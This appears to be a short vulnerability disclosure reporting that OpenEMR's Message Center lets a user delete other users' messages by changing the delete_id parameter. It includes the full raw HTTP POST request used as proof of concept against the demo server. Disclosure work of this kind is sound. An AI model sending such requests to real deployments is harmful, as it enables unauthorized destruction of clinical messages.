I observed that users can delete messages in other’s Message Center by changing delete_id parameter to delete_id value of message which belongs to other.
POST /openemr/interface/main/messages/messages.php?showall=&sortby=pnotes.date&sortorder=desc&begin=0&form_active=1 HTTP/1.1
Host: demo.openemr.io
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://demo.openemr.io
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://demo.openemr.io/openemr/interface/main/messages/messages.php?form_active=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OpenEMR=F%2CirXOlXHBMtyJUilGMZ0%2C9PvCyhZXGdzItmkF7g5BnT8pyP
Connection: close
task=delete&delete_id%5B%5D=7